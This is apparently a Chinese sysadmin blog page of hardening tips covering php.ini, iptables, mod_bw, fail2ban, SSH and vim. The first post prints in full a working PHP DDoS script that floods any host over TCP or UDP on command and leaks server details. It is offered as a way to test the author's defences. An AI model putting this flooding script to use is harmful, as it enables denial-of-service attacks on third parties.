分类 运维技术 下的文章

前几天有台香港服务器上的DEDE用户被入侵了,植入了PHP-DDOS发包代码,影响了网络,导致同服务器用户网站都无法正常访问。这段代码是用fsockopen函数请求外部,我们可以禁止这个函数。

php.ini

搜索:disable_functions
在后面加上:fsockopen

allow_url_fopen = Off

ignore_user_abort = On

以及把

extension=php_sockets.dll
改成
;extension=php_sockets.dll

保存退出,重启 Apache。

然后利用iptables,禁本机对外发送UDP包

iptables -A INPUT -p tcp -m tcp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --sport 1024:65535 -d 8.8.4.4 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p udp -m udp --sport 1024:65535 -d 8.8.8.8 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p udp -j REJECT

以上就可以防止PHP-DDOS发包了,但是可能会使一些PHP程序异常,比如DZ需要fsockopen函数发信等。但都有解决办法,可以把fsockopen函数,替换为:pfsockopen,就基本可以解决所有问题了。

一段PHPDDOS代码,完成以上操作后,可以试试能否运行成功。

<?php 
error_reporting(0);//禁用错误报告 
set_time_limit(0);//配置该页最久执行时间。  0为永久执行 
ignore_user_abort(false); //设置与客户机断开是否会终止脚本的执行。 
   
/*get参数*/
$type = $_GET['type']; //攻击方式 0为TCP 1为UDP 
$host = $_GET['host'];  //攻击目标 
$port = $_GET['port'];  //攻击端口 
$exec_time = $_GET['time'];  //持续时间 
$Sendlen = $_GET['size'];   //发送数据长度  如果为0则使用自定义数据包 
$data =  $_GET['data']; //自定义数据包 最大为1024KB 格式为URL编码 
$data = urldecode($data); //URL解码后的字符串 
$count = $_GET['count']; //限制发包次数   0为不限制然后只能通过时间控制 
/*end*/
   
if (function_exists('fsockopen')){$test="1";}else{$test="0";}//fsockopen是否能用 
   
//检测服务器信息 返回格式 [标识符]函数状态|主机名|脚本名|服务器信息|结译引擎[标识符]  
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ 
        if (StrLen($_GET['rat'])<>0){ 
            echo $_GET['rat'].$test."|".$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER
   
['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; 
            exit; 
            } 
    echo "error"; 
    exit; 
    } 
   
$byte = 0;//记录发包次数 
$max_time = time()+$exec_time;//设置结束时间 
   
if($Sendlen!=0){ 
    for($i=0;$i<$Sendlen;$i++){$out .= "X";}//构造指定长度数据包 
}else{ 
    $out = $data;  //设置为自定义数据包 
} 
   
//死循环发送数据 
while(1){ 
    if(time() > $max_time){break;}//时间到了就跳出循环         
       
    //判断攻击方式 
    if($type==1) {     
        $fp = fsockopen("tcp://$host", $port, $errno, $errstr, 5);//打开TCP连接 
    } else {     
        $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);//打开UDP连接 
    } 
        if($fp){            //如果连接成功 
            fwrite($fp, $out);  //发送数据 
            fclose($fp);  //关闭连接 
    } 
       
    $byte++;//发包次数加1 
       
    if((int)$count!=0){ 
        if($byte > (int)$count){break;}//发包次数大于设置的就跳出循环 
    }    
} 
?>

这里只列出比较常用的参数,详细的请查看man iptables

1、查看
iptables -nvL –line-number

-L 查看当前表的所有规则,默认查看的是filter表,如果要查看NAT表,可以加上-t NAT参数
-n 不对ip地址进行反查,加上这个参数显示速度会快很多
-v 输出详细信息,包含通过该规则的数据包数量,总字节数及相应的网络接口
–line-number 显示规则的序列号,这个参数在删除或修改规则时会用到

2、添加
添加规则有两个参数:-A和-I。其中-A是添加到规则的末尾;-I可以插入到指定位置,没有指定位置的话默认插入到规则的首部。

当前规则:

[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    DROP       all  --  192.168.1.4          0.0.0.0/0

添加一条规则到尾部:

[root@test ~]# iptables -A INPUT -s 192.168.1.5 -j DROP

再插入一条规则到第三行,将行数直接写到规则链的后面:

[root@test ~]# iptables -I INPUT 3 -s 192.168.1.3 -j DROP

查看:

[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    DROP       all  --  192.168.1.3          0.0.0.0/0
4    DROP       all  --  192.168.1.4          0.0.0.0/0
5    DROP       all  --  192.168.1.5          0.0.0.0/0

可以看到192.168.1.3插入到第三行,而原来的第三行192.168.1.4变成了第四行。

3、删除
删除用-D参数

删除之前添加的规则(iptables -A INPUT -s 192.168.1.5 -j DROP):

[root@test ~]# iptables -D INPUT -s 192.168.1.5 -j DROP

有时候要删除的规则太长,删除时要写一大串,既浪费时间又容易写错,这时我们可以先使用–line-number找出该条规则的行号,再通过行号删除规则。

[root@test ~]# iptables -nv --line-number
iptables v1.4.7: no command specified
Try `iptables -h' or 'iptables --help' for more information.
[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    DROP       all  --  192.168.1.3          0.0.0.0/0

删除第二行规则

[root@test ~]# iptables -D INPUT 2

4、修改
修改使用-R参数

先看下当前规则:

[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    DROP       all  --  192.168.1.5          0.0.0.0/0

将第三条规则改为ACCEPT:

[root@test ~]# iptables -R INPUT 3 -j ACCEPT

再查看下:

[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0

第三条规则的target已改为ACCEPT。

转载:http://ns.35.com/?p=211

下载页面为:http://ivn.cl/2010/01/06/downloads-for-bandwidth-mod/ ,目前针对linux/unix的最新版本是0.92。

wget http://legacy.ivn.cl/files/source/mod_bw-0.92.tgz
tar zxvf mod_bw-0.92.tgz
apxs -i -a -c mod_bw.c 或
apxs2 -i -a -c mod_bw.c

配置参数非常丰富,可以满足很多需求,详见压缩包内的:mod_bw.txt

简单应用示例

Limit every user to a max of 10Kb/s on a vhost :

    <Virtualhost *>
      BandwidthModule On
      ForceBandWidthModule On
      Bandwidth all 10240
      MinBandwidth all -1
      Servername www.example.com
    </Virtualhost>

Limit al internal users (lan) to 1000 kb/s with a minimum of 50kb/s , and
files greater than 500kb to 50kb/s.

    <Virtualhost *>
      BandwidthModule On
      ForceBandWidthModule On
      Bandwidth all 1024000
      MinBandwidth all 50000
      LargeFileLimit * 500 50000
      Servername www.example.com
    </Virtualhost>

Limit avi and mpg extensions to 20kb/s.

    <Virtualhost *>
      BandwidthModule On
      ForceBandWidthModule On
      LargeFileLimit .avi 1 20000
      LargeFileLimit .mpg 1 20000
      Servername www.example.com
    </Virtualhost>

Using it the "right" way, with output filter by mime type (for text)
to 5kb/s:

    <Virtualhost *>
      BandwidthModule On
      AddOutputFilterByType MOD_BW text/html text/plain
      Bandwidth all 5000
      Servername www.example.com 
    </Virtualhost> 

编辑 /etc/ssh/ssd_config 文件,里面是可以允许某些用户登录,或者禁止某些用户登录的。

AllowUsers test

如果有这条的话,此系统将只允许test一个用户ssh登录,其他用户都会得到 Access Denied! 这个提示。
另起一行复制那条语句,把test替换为root,就可以登入了。

.tar
解包:tar zxvf FileName.tar
打包:tar czvf FileName.tar DirName
.gz
解压1:gunzip FileName.gz
解压2:gzip -d FileName.gz
压缩:gzip FileName
.tar.gz 和 .tgz
解压:tar zxvf FileName.tar.gz
压缩:tar zcvf FileName.tar.gz DirName
.bz2
解压1:bzip2 -d FileName.bz2
解压2:bunzip2 FileName.bz2
压缩: bzip2 -z FileName
.tar.bz2
解压:tar jxvf FileName.tar.bz2
压缩:tar jcvf FileName.tar.bz2 DirName
.bz
解压1:bzip2 -d FileName.bz
解压2:bunzip2 FileName.bz
压缩:未知
.tar.bz
解压:tar jxvf FileName.tar.bz
压缩:未知
.Z
解压:uncompress FileName.Z
压缩:compress FileName
.tar.Z
解压:tar Zxvf FileName.tar.Z
压缩:tar Zcvf FileName.tar.Z DirName
.zip
解压:unzip FileName.zip
压缩:zip FileName.zip DirName
.rar
解压:rar a FileName.rar
压缩:r ar e FileName.rar
rar请到:http://www.rarsoft.com/download.htm 下载!
解压后请将rar_static拷贝到/usr/bin目录(其他由$PATH环境变量指定的目录也可以):
[root@www2 tmp]# cp rar_static /usr/bin/rar

.lha
解压:lha -e FileName.lha
压缩:lha -a FileName.lha FileName

lha请到:http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/下载!
>解压后请将lha拷贝到/usr/bin目录(其他由$PATH环境变量指定的目录也可以):
[root@www2 tmp]# cp lha /usr/bin/

.rpm
解包:rpm2cpio FileName.rpm | cpio -div
.deb
解包:ar p FileName.deb data.tar.gz | tar zxf -

转载自:http://www.blogjava.net/jiangjf/archive/2007/07/29/133122.html

上次介绍了用Fail2Ban 防御 SSH、FTP的穷举,但其实fail2ban的可扩展性很好,只要是有登入错误的纪录档,及写下正确的正规表示式便可以使用,以下是阻挡SquirrelMail、POP3、SMTP、POSTFIX的穷举。(我是在DirectAdmin(DA)下配置,其它请根据自身修正 logpath 位置)

一、SquirrelMail 防御

编辑 /etc/fail2ban/jail.conf 文件, 并加入以下內容:

[squirrelmail-iptables]

enabled = true
filter = squirrelmail
action = iptables[name=SquirrelMail, port=http, protocol=tcp]
logpath = /var/log/maillog
bantime = 3600
findtime = 300
maxretry = 6

- 阅读剩余部分 -

iptables是Linux下不错的防火墙软件,本文主要给大家介绍下iptables的安装、规则增加和清除、开放指定端口、屏蔽指定ip和ip段等CentOS下iptables的基本应用。

一、iptables的安装

yum install iptables

如果CentOS没有默认安装iptables,则执行上述命令。如何知道系统是否有iptables呢?执行以下命令

service iptables status

如果提示 iptables:unrecognized service 则表示系统尚未安装。

二、iptables所在目录与配置文件(IP4)

安装完iptables后,配置文件默认在/etc/sysconfig/iptables

- 阅读剩余部分 -

Linux各发行版中SSH端口默认为22,如果正式做站或其它用途,为了提高安全性就需要修改掉默认的SSH端口号,防止被有心人穷举密码。

1、修改配置文件:/etc/ssh/sshd_config ,找到#port 22

2、先将Port 22 前面的 # 号去掉,并另起一行。如定义SSH端口号为26611 ,则输入 Port 26611
自定义端口选择建议在万位的端口(如:10000-65535之间)

- 阅读剩余部分 -

:qx     开始记录宏,并将结果存入寄存器x
q     退出记录模式
@x     播放记录在x寄存器中的宏命令

稍微解释一下,当在normal模式下输入:qx后,你对文本的所有编辑动作将会被记录下来,再次输入q即退出了记录模
式,然后输入@x对刚才记录下来的命令进行重复,此命令后可跟数字,表示要重复多少次,比如@x20,可以重复20次。这个在文本的批处理中是非常有用的。

同时编辑多个文件
在vim众多的插件中,有一个叫minibuffer的插件,就是下面所说的标签页功能了,可以支持同时编辑多个文件。

标签命令

:tabe fn     在一个新的标签页中编辑文件fn
gt     切换到下一个标签页
gT     切换到上一个标签页
:tabr     切换到第一个标签页
:tabl     切换到最后一个标签页
:tabm [N]     把当前tab移动到第N个tab之后
对,正如你所想象的那样,跟eclipse, ue等的标签页是一个意思!
窗口命令
ctrl+w s     水平分割窗口
ctrl+w w     切换窗口
ctrl+w q     退出当前窗口(由于同时有多个文件,此命令不会影响其他窗口)
ctrl+w v     垂直分割窗口

其他
vim在保存之前不会对文件做实际的修改,只是加载到缓冲区中,对文件的编辑其实是对缓冲区的编辑,直到:w时才会存入物理文件。

:e file     把file加载到新的缓冲区中
:bn     跳转到下一个缓冲区
:bd     删除缓冲区(关闭文件)
:sp fn     分割窗口,并将fn加载到新的窗口中

退出编辑器

:w     将缓冲区写入文件,即保存修改
:wq     保存修改并退出
:x     保存修改并退出
:q     退出,如果对缓冲区进行过修改,则会提示
:q!     强制退出,放弃修改

查找替换

/pattern     向后搜索字符串pattern
?pattern     向前搜索字符串pattern
n     下一个匹配(如果是/搜索,则是向下的下一个,?搜索则是向上的下一个)
N     上一个匹配(同上)
:%s/old/new/g     搜索整个文件,将所有的old替换为new
:%s/old/new/gc     搜索整个文件,将所有的old替换为new,每次都要你确认是否替换

复制粘贴

dd     删除光标所在行
dw     删除一个字(word)
x     删除当前字符
X     删除前一个字符
D     删除到行末
yy     复制一行,此命令前可跟数字,标识复制多行,如6yy,表示从当前行开始复制6行
yw     复制一个字
y$     复制到行末
p     粘贴粘贴板的内容到当前行的下面
P     粘贴粘贴板的内容到当前行的上面
]p     有缩进的粘贴,vim会自动调节代码的缩进
"a     将内容放入/存入a寄存器,可以支持多粘贴板

附:比如常用的一个寄存器就是系统寄存器,名称为+,所以从系统粘贴板粘贴到vim中的命令为"+p,注意此处的+不表示操作符,二十一个寄存器。

移动光标
在vim中移动光标跟其他的编辑器中有很大的区别,不过一旦学会了,就会飞速的在文本中移动了。

h,j,k,l     上,下,左,右
ctrl-f     上翻一页
ctrl-b     下翻一页
%     跳到与当前括号匹配的括号处,如当前在{,则跳转到与之匹配的}处
w     跳到下一个字首,按标点或单词分割
W     跳到下一个字首,长跳,如end-of-line被认为是一个字
e     跳到下一个字尾
E     跳到下一个字尾,长跳
b     跳到上一个字
B     跳到上一个字,长跳
0     跳至行首,不管有无缩进,就是跳到第0个字符
^     跳至行首的第一个字符
$     跳至行尾
gg     跳至文件的第一行
gd     跳至当前光标所在的变量的声明处
[N]G     跳到第N行,如0G,就等价于gg,100G就是第100行
fx     在当前行中找x字符,找到了就跳转至
;     重复上一个f命令,而不用重复的输入fx
tx     与fx类似,但是只是跳转到x的前一个字符处
Fx     跟fx的方向相反
),(     跳转到上/下一个语句
*     查找光标所在处的单词,向下查找
#     查找光标所在处的单词,向上查找
`.     跳转至上次编辑位置

在屏幕上移动

H     移动光标到当前屏幕上最上边的一行
M     移动光标到当前屏幕上中间的一行
L     移动光标到当前屏幕上最下边的一行

书签

ma     把当前位置存成标签a
`a     跳转到标签a处

编辑

r     替换一个字符
J     将下一行和当前行连接为一行
cc     删除当前行并进入编辑模式
cw     删除当前字,并进入编辑模式
c$     擦除从当前位置至行末的内容,并进入编辑模式
s     删除当前字符并进入编辑模式
S     删除光标所在行并进入编辑模式
xp     交换当前字符和下一个字符
u     撤销
ctrl+r     重做
.     重复上一个编辑命令
~     切换大小写,当前字符
g~iw     切换当前字的大小写
gUiw     将当前字变成大写
guiw     将当前字变成小写
>>     将当前行右移一个单位
<<     将当前行左移一个单位(一个tab符)
==     自动缩进当前行

插入模式

i     从当前光标处进入插入模式
I     进入插入模式,并置光标于行首
a     追加模式,置光标于当前光标之后
A     追加模式,置光标于行末
o     在当前行之下新加一行,并进入插入模式
O     在当前行之上新加一行,并进入插入模式
Esc     退出插入模式

可视模式

标记文本
v     进入可视模式,单字符模式
V     进入可视模式,行模式
ctrl+v     进入可视模式,列模式,类似于UE的列模式
o     跳转光标到选中块的另一个端点
U     将选中块中的内容转成大写
O     跳转光标到块的另一个端点
aw     选中一个字
ab     选中括号中的所有内容,包括括号本身
aB     选中{}括号中的所有内容
ib     选中括号中的内容,不含括号
iB     选中{}中的内容,不含{}

#对标记进行动作
>     块右移
<     块左移
y     复制块
d     删除块
~     切换块中内容的大小写

apf -f
rm -fv /etc/cron.daily/fw
rm -fv /etc/cron.daily/apf
rm -fv /etc/cron.d/refresh.apf
rm -fv /etc/logrotate.d/apf
rm -fv /var/log/apf*
/sbin/chkconfig apf off
/sbin/chkconfig apf --del
rm -fv /etc/init.d/apf
rm -Rfv /etc/apf
rm -fv /etc/cron.d/bfd
rm -fv /etc/logrotate.d/bfd
rm -fv /var/log/bfd*
rm -Rfv /usr/local/bfd

- 阅读剩余部分 -